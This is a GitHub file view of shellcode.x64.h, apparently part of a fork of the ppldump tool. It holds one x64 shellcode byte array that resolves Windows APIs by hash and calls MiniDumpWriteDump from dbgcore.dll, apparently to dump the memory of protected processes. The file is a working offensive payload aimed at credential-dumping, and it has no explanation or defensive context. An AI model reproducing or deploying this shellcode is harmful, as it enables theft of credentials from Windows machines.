forked from topotam/ppldump
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathshellcode.x64.h
70 lines (70 loc) · 4.23 KB
/
shellcode.x64.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
unsigned char buf[] =
"\x56\x48\x89\xe6\x48\x83\xe4\xf0\x48\x83\xec\x20\xe8\xaf\x01"
"\x00\x00\x48\x89\xf4\x5e\xc3\x66\x2e\x0f\x1f\x84\x00\x00\x00"
"\x00\x00\x4d\x69\x6e\x69\x44\x75\x6d\x70\x57\x72\x69\x74\x65"
"\x44\x75\x6d\x57\x56\x53\x48\x83\xec\x20\x65\x48\x8b\x04\x25"
"\x60\x00\x00\x00\x48\x8b\x40\x18\x48\x8b\x58\x10\x48\x8d\x70"
"\x10\x48\x39\xde\x74\x2f\x89\xcf\xeb\x08\x48\x8b\x1b\x48\x39"
"\xde\x74\x23\x0f\xb7\x53\x58\x48\x8b\x4b\x60\xe8\xc6\x00\x00"
"\x00\x39\xf8\x75\xe7\x48\x8b\x43\x30\x48\x83\xc4\x20\x5b\x5e"
"\x5f\xc3\x66\x0f\x1f\x44\x00\x00\x48\x83\xc4\x20\x31\xc0\x5b"
"\x5e\x5f\xc3\x90\x90\x90\x90\x90\x90\x41\x56\x41\x55\x41\x54"
"\x55\x57\x56\x53\x48\x83\xec\x20\x48\x63\x41\x3c\x8b\xbc\x01"
"\x88\x00\x00\x00\x48\x01\xcf\x8b\x5f\x20\x8b\x47\x18\x44\x8b"
"\x67\x1c\x44\x8b\x6f\x24\x48\x01\xcb\x85\xc0\x74\x53\x89\xd5"
"\x48\x89\xce\x45\x31\xf6\xeb\x16\x0f\x1f\x44\x00\x00\x41\x8d"
"\x46\x01\x48\x83\xc3\x04\x49\x83\xc6\x01\x39\x47\x18\x76\x33"
"\x8b\x0b\x31\xd2\x48\x01\xf1\xe8\x43\x00\x00\x00\x39\xe8\x75"
"\xdf\x4a\x8d\x04\x76\x42\x0f\xb7\x04\x28\x48\x8d\x04\x86\x42"
"\x8b\x04\x20\x48\x83\xc4\x20\x5b\x48\x01\xf0\x5e\x5f\x5d\x41"
"\x5c\x41\x5d\x41\x5e\xc3\x48\x83\xc4\x20\x31\xc0\x5b\x5e\x5f"
"\x5d\x41\x5c\x41\x5d\x41\x5e\xc3\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x85\xd2\x74\x4e\x49\x89\xc9\xb8\x12\x14\x00"
"\x00\x4d\x89\xca\x45\x0f\xb6\x01\x49\x29\xca\x44\x39\xd2\x76"
"\x35\x49\x83\xc1\x01\x45\x84\xc0\x74\xe8\x45\x8d\x50\xe0\x41"
"\x80\xf8\x60\x45\x0f\x4f\xc2\x41\x89\xc2\x41\xc1\xe2\x05\x45"
"\x0f\xbe\xc0\x44\x01\xd0\x4d\x89\xca\x49\x29\xca\x44\x01\xc0"
"\x45\x0f\xb6\x01\x44\x39\xd2\x77\xcb\xf3\xc3\x0f\xb6\x11\xb8"
"\x12\x14\x00\x00\x84\xd2\x74\x27\x66\x90\x44\x8d\x42\xe0\x48"
"\x83\xc1\x01\x80\xfa\x60\x41\x0f\x4f\xd0\x41\x89\xc0\x41\xc1"
"\xe0\x05\x0f\xbe\xd2\x44\x01\xc2\x01\xd0\x0f\xb6\x11\x84\xd2"
"\x75\xdb\xf3\xc3\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x48"
"\xb8\x64\x62\x67\x63\x6f\x72\x65\x2e\x48\x89\xe5\x41\x57\x41"
"\x56\x41\x55\x41\x54\x49\x89\xce\x57\x56\xb9\xe2\x8f\xa5\x16"
"\x53\x48\x83\xe4\xf0\x48\x83\xec\x70\x66\x0f\x6f\x05\x2f\xfe"
"\xff\xff\x48\x89\x44\x24\x44\xc7\x44\x24\x4c\x64\x6c\x6c\x00"
"\x0f\x29\x44\x24\x50\xc6\x44\x24\x60\x70\xc6\x44\x24\x61\x00"
"\xe8\x1e\xfe\xff\xff\xba\x68\x2a\xd1\x5f\x48\x89\xc3\x48\x89"
"\xc1\xe8\x6e\xfe\xff\xff\x48\x89\xd9\xba\xe7\x7d\x7b\xf1\x49"
"\x89\xc7\xe8\x5e\xfe\xff\xff\x48\x89\xd9\xba\xd4\x85\xb7\x86"
"\x48\x89\xc6\xe8\x4e\xfe\xff\xff\x48\x89\xd9\xba\x14\xfa\xff"
"\x3f\x48\x89\xc7\xe8\x3e\xfe\xff\xff\x48\x89\xd9\xba\xc1\xd8"
"\xe6\x3f\x49\x89\xc4\xe8\x2e\xfe\xff\xff\x48\x89\xd9\xba\x8c"
"\x93\x02\xe2\x49\x89\xc5\xe8\x1e\xfe\xff\xff\x48\x8d\x4c\x24"
"\x44\x48\x89\xc3\x41\xff\xd7\x48\x85\xc0\x74\x7a\x48\x8d\x54"
"\x24\x50\x48\x89\xc1\xff\xd3\x45\x31\xc9\x49\x89\xc7\x48\xc7"
"\x44\x24\x30\x00\x00\x00\x00\xc7\x44\x24\x28\x80\x00\x00\x00"
"\xc7\x44\x24\x20\x02\x00\x00\x00\x41\xb8\x01\x00\x00\x00\xba"
"\x00\x00\x00\xc0\x4c\x89\xf1\xff\xd6\x48\x85\xc0\x48\x89\xc3"
"\x74\x39\x41\xff\xd5\x89\xc6\x41\xff\xd4\x48\xc7\x44\x24\x30"
"\x00\x00\x00\x00\x48\x89\xc1\x48\xc7\x44\x24\x28\x00\x00\x00"
"\x00\x48\xc7\x44\x24\x20\x00\x00\x00\x00\x41\xb9\x02\x02\x01"
"\x00\x49\x89\xd8\x89\xf2\x41\xff\xd7\x48\x89\xd9\xff\xd7\x48"
"\x8d\x65\xc8\x5b\x5e\x5f\x41\x5c\x41\x5d\x41\x5e\x41\x5f\x5d"
"\xc3\x90\x90\x90\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00";